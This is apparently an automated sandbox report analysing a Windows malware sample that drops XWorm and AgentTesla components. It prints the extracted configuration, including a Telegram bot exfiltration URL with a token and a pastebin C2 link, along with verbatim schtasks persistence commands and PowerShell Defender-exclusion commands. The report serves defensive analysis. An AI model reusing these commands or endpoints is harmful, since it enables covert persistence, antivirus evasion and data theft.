Analysis
-
max time kernel
67s -
max time network
107s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
22/02/2024, 15:56
Static task
static1
Behavioral task
behavioral1
Sample
NerestPc.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
NerestPc.exe
Resource
win10v2004-20240221-en
General
-
Target
NerestPc.exe
-
Size
2.8MB
-
MD5
9db30dedeed5a5d3b7bee80b5bdbbc46
-
SHA1
7cf71e9c9b433d269050011f9e76e70f083282d6
-
SHA256
047f4f423ccd4d20d1f4f4fa9d2c4e03641b00ace5929c86327974945bb0648a
-
SHA512
f0adc2e17ebfda0d5a0157245e3912e777509e71b7c31cbf735fedbf10f6a350661a127436fc90616067b8928fb002b79585998996857aed2b82c06590a8ba02
-
SSDEEP
49152:AtKPduNQ7ekxGFj5pU5r08ZbSR/6x1k2akRbfSafKN8q6o5pOuP6kv21BN4CArY:AtKlum7l4pU28SR/OTRbf+8q38uSEuBd
Malware Config
Extracted
xworm
-
Install_directory
%Temp%
-
install_file
wininit.exe
-
pastebin_url
https://pastebin.com/raw/7MyeMz9p
-
telegram
https://api.telegram.org/bot6924062419:AAH4gnyXxdFAI3v9Q7dkCjzPoXbFknr155o/sendMessage?chat_id=6986550905
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral1/files/0x0031000000015c1e-23.dat family_xworm behavioral1/files/0x0031000000015c1e-38.dat family_xworm behavioral1/memory/2488-42-0x0000000000800000-0x0000000000816000-memory.dmp family_xworm behavioral1/memory/1704-144-0x0000000000BE0000-0x0000000000BF6000-memory.dmp family_xworm -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\ProgramData\\Microsoft\\Windows\\Templates\\f4bnmzy2.qnf.exe" neresthelper.exe -
AgentTesla payload 2 IoCs
resource yara_rule behavioral1/memory/2648-44-0x000000001CB50000-0x000000001CD62000-memory.dmp family_agenttesla behavioral1/memory/2488-87-0x000000001B200000-0x000000001B280000-memory.dmp family_agenttesla -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wininit.lnk f4bnmzy2.qnf.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wininit.lnk f4bnmzy2.qnf.exe -
Executes dropped EXE 6 IoCs
pid Process 2080 neresthelper.exe 2648 NerestPC.exe 2488 f4bnmzy2.qnf.exe 1276 Process not Found 1704 wininit.exe 2640 mnqtzp.exe -
Loads dropped DLL 2 IoCs
pid Process 1644 NerestPc.exe 1276 Process not Found -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wininit.exe" f4bnmzy2.qnf.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 4 pastebin.com 5 pastebin.com 10 7.tcp.eu.ngrok.io -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 mnqtzp.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2440 schtasks.exe 2020 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS NerestPC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer NerestPC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion NerestPC.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 1908 powershell.exe 2496 powershell.exe 568 powershell.exe 1968 powershell.exe 2488 f4bnmzy2.qnf.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 2648 NerestPC.exe Token: SeDebugPrivilege 2488 f4bnmzy2.qnf.exe Token: SeDebugPrivilege 1908 powershell.exe Token: SeDebugPrivilege 2496 powershell.exe Token: SeDebugPrivilege 568 powershell.exe Token: SeDebugPrivilege 1968 powershell.exe Token: SeDebugPrivilege 2488 f4bnmzy2.qnf.exe Token: SeDebugPrivilege 1704 wininit.exe Token: SeShutdownPrivilege 2640 mnqtzp.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2488 f4bnmzy2.qnf.exe -
Suspicious use of WriteProcessMemory 37 IoCs
description pid Process procid_target PID 1644 wrote to memory of 2080 1644 NerestPc.exe 28 PID 1644 wrote to memory of 2080 1644 NerestPc.exe 28 PID 1644 wrote to memory of 2080 1644 NerestPc.exe 28 PID 1644 wrote to memory of 2648 1644 NerestPc.exe 29 PID 1644 wrote to memory of 2648 1644 NerestPc.exe 29 PID 1644 wrote to memory of 2648 1644 NerestPc.exe 29 PID 2080 wrote to memory of 2596 2080 neresthelper.exe 30 PID 2080 wrote to memory of 2596 2080 neresthelper.exe 30 PID 2080 wrote to memory of 2596 2080 neresthelper.exe 30 PID 2596 wrote to memory of 2440 2596 CMD.exe 32 PID 2596 wrote to memory of 2440 2596 CMD.exe 32 PID 2596 wrote to memory of 2440 2596 CMD.exe 32 PID 2080 wrote to memory of 2488 2080 neresthelper.exe 33 PID 2080 wrote to memory of 2488 2080 neresthelper.exe 33 PID 2080 wrote to memory of 2488 2080 neresthelper.exe 33 PID 2488 wrote to memory of 1908 2488 f4bnmzy2.qnf.exe 35 PID 2488 wrote to memory of 1908 2488 f4bnmzy2.qnf.exe 35 PID 2488 wrote to memory of 1908 2488 f4bnmzy2.qnf.exe 35 PID 2488 wrote to memory of 2496 2488 f4bnmzy2.qnf.exe 37 PID 2488 wrote to memory of 2496 2488 f4bnmzy2.qnf.exe 37 PID 2488 wrote to memory of 2496 2488 f4bnmzy2.qnf.exe 37 PID 2488 wrote to memory of 568 2488 f4bnmzy2.qnf.exe 39 PID 2488 wrote to memory of 568 2488 f4bnmzy2.qnf.exe 39 PID 2488 wrote to memory of 568 2488 f4bnmzy2.qnf.exe 39 PID 2488 wrote to memory of 1968 2488 f4bnmzy2.qnf.exe 41 PID 2488 wrote to memory of 1968 2488 f4bnmzy2.qnf.exe 41 PID 2488 wrote to memory of 1968 2488 f4bnmzy2.qnf.exe 41 PID 2488 wrote to memory of 2020 2488 f4bnmzy2.qnf.exe 43 PID 2488 wrote to memory of 2020 2488 f4bnmzy2.qnf.exe 43 PID 2488 wrote to memory of 2020 2488 f4bnmzy2.qnf.exe 43 PID 1092 wrote to memory of 1704 1092 taskeng.exe 48 PID 1092 wrote to memory of 1704 1092 taskeng.exe 48 PID 1092 wrote to memory of 1704 1092 taskeng.exe 48 PID 2488 wrote to memory of 2640 2488 f4bnmzy2.qnf.exe 49 PID 2488 wrote to memory of 2640 2488 f4bnmzy2.qnf.exe 49 PID 2488 wrote to memory of 2640 2488 f4bnmzy2.qnf.exe 49 PID 2488 wrote to memory of 2640 2488 f4bnmzy2.qnf.exe 49 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\NerestPc.exe"C:\Users\Admin\AppData\Local\Temp\NerestPc.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Users\Admin\AppData\Roaming\neresthelper.exe"C:\Users\Admin\AppData\Roaming\neresthelper.exe"2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\system32\CMD.exe"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "System Update" /tr "C:\ProgramData\Microsoft\Windows\Templates\f4bnmzy2.qnf.exe" & exit3⤵
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\system32\schtasks.exeSchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "System Update" /tr "C:\ProgramData\Microsoft\Windows\Templates\f4bnmzy2.qnf.exe"4⤵
- Creates scheduled task(s)
PID:2440
-
-
-
C:\ProgramData\Microsoft\Windows\Templates\f4bnmzy2.qnf.exe"C:\ProgramData\Microsoft\Windows\Templates\f4bnmzy2.qnf.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Templates\f4bnmzy2.qnf.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'f4bnmzy2.qnf.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2496
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\wininit.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wininit.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "wininit" /tr "C:\Users\Admin\AppData\Local\Temp\wininit.exe"4⤵
- Creates scheduled task(s)
PID:2020
-
-
C:\Users\Admin\AppData\Local\Temp\mnqtzp.exe"C:\Users\Admin\AppData\Local\Temp\mnqtzp.exe"4⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of AdjustPrivilegeToken
PID:2640
-
-
-
-
C:\Users\Admin\AppData\Roaming\NerestPC.exe"C:\Users\Admin\AppData\Roaming\NerestPC.exe"2⤵
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {85F7B5B9-E0D7-4731-AFD3-2CCFF2B08CF4} S-1-5-21-406356229-2805545415-1236085040-1000:IKJSPGIM\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Users\Admin\AppData\Local\Temp\wininit.exeC:\Users\Admin\AppData\Local\Temp\wininit.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD5c8950630ba05cf7b9b9d0145153eeff2
SHA1ee6ebbc4d199330368a86671eea6ecf9ff2bf534
SHA25621f7349415c1e0c8808c236168ea0f1e33224930a74b95d24814280d3bf175ea
SHA5124c73808e2b52bbf8fff02a53eaebb28621db21e3e64e402e74a062e9abd5d0088b72e7993e85b1e3b4277067a3994c42650f65c60e0971fb9386208bb7334c16
-
Filesize
60KB
MD5defabd9c517324d47136839fd95f5e36
SHA1939476feb1c30d693f2d986887491ba32f273590
SHA256af63227cb6a4fe78c3a4d1483f158cfe67e076a8ff2c3e9f7d801ca65536543c
SHA512ae031414e0e6a5de61d366ea1c5f04754502f5d6c781c3fea8dd2ff697c5c09c8df93903441081afc84ddb4fdd935d0a069cbae156a3027d1c248b032c1d0453
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
Filesize
17KB
MD5eda44bffd57ead6f12a99a15f7089c37
SHA1dbaf2ab7898777079ef8984338c91d4d5e188cd0
SHA256821e8afdda6cd8833ccf5e5548b787cbc48eaeba0b8e7fc7962494ddc79e10d6
SHA512e6a13b593ea41c867678c91ea6a90774af9aeff653f705aa8549ea01cf278271dcc6be9e204e431d5061e89651906b86318a7497a3943b242b5df1b6cea3ea14
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD53bf2062a5d0f75ce17cbd13c25c54c63
SHA150fec4e6e4e0e206c62390da3fb79d50ba256f9f
SHA256c5f83739e3541c5c726efffd4eecdb041cd0186a6e043cb6306098451632f11c
SHA5126fd93e9dd8929abc4678e6e441dd04cb124bff31bf4dd6ecc728110b23efc0dc9c73fafbd3ac2665a5a73d9ae1998191c41c78e879b5e56d4c0f5240c5ed65d6
-
Filesize
2.2MB
MD54d979d5c69dbce73c543ac41ae850703
SHA1c68e35fca219b31093cb34d135aef038d76a0832
SHA2566c4d1fb30e1cbb7dec8d38ae27226b805ec0d77aa046b87724c56bc305913eed
SHA5125c543c610c28a71438990d42882e2dee9714a71db697b01491bb0fc2e5f2ce68e69a97eed464a4f7a51b50b73a09c9c7f3c907e53e3728e46f2698be52fe8750
-
Filesize
2.2MB
MD5107c5610fe7c95eca374e612486fc9bd
SHA1f3a2493d16c4e5a509ea6520851fe06f81a68cbe
SHA256297a40d7ec75b78e96198d9c5e77bd520b11d2a3614562926cce3604a79547d5
SHA5121a9a3cba1977d99e0ddff23b7d8b269b9f4eae9593753c838b47014addb99e978b930e860375a2757ada76a9a26186597cb9a753fd6f32b8bd9076e4eecc5c5f
-
Filesize
73KB
MD5045d0a1e3f259034fc563c3aa7efac51
SHA17ad761e506d74178983f2fce002441709f6554ce
SHA25622286ac2e488532123af91d73b67d1a364dfafbc39ede033ba19ae68a38510f1
SHA5126fba3bf3bee7f8667cae3560e9d2339cb73c05591c6441eddf81e5aea5478089e3ed1d88c731518bced167c47fc31ac7290e6f35e9bec20d49c30742007a7e77
-
Filesize
2.7MB
MD590bfd119960b86518254278ed2a71814
SHA14616df24481d165ce54475495a5510f8be4c31e4
SHA2562f3d10d69bd1139a49aab91e8caf9a3dd452a464413a386a04380a5566d16bf8
SHA5127fd0f01096076419dd5ff13be232ad67a6933feddaccbccfda697d88012106bc26bac9c617b2854e706d79e706ebfeb33aeb3b61b257d0406836df356613781d
-
Filesize
304KB
MD5f1f3256fc2ba4dd820358a3e290c7d5f
SHA1f21b53e48a70dca560f30416dd8babaa4b464f14
SHA2567ebb91dc193607430a533560afb6dd4086c2c0cad523574aecdba3e521b68c40
SHA512e288c5fc9c6909a1a09712bb10c5f802b46fd9e79ec3fa0cf5b5c5f0b03f3763185a89da60e39c1116b49cf961d724bfb4e13779ecf861d9671c03d5d96b1fff
-
Filesize
256KB
MD515c61f8e548f9a864ea1f56348859754
SHA1b59e04af46382acb26efa882529e360eb82dcfe9
SHA256d0edf4142a58606edd4d6c8b615286485229b234229e79c1f9e1aaf01f8043f9
SHA512c87c0213a956cba9f18548f637f473fd0b5b148592ec18878a70ad0371ac1fa05f179b08e2e82617c213ecbb44d5f2653bdc9f10765965b2d5370484042bdd46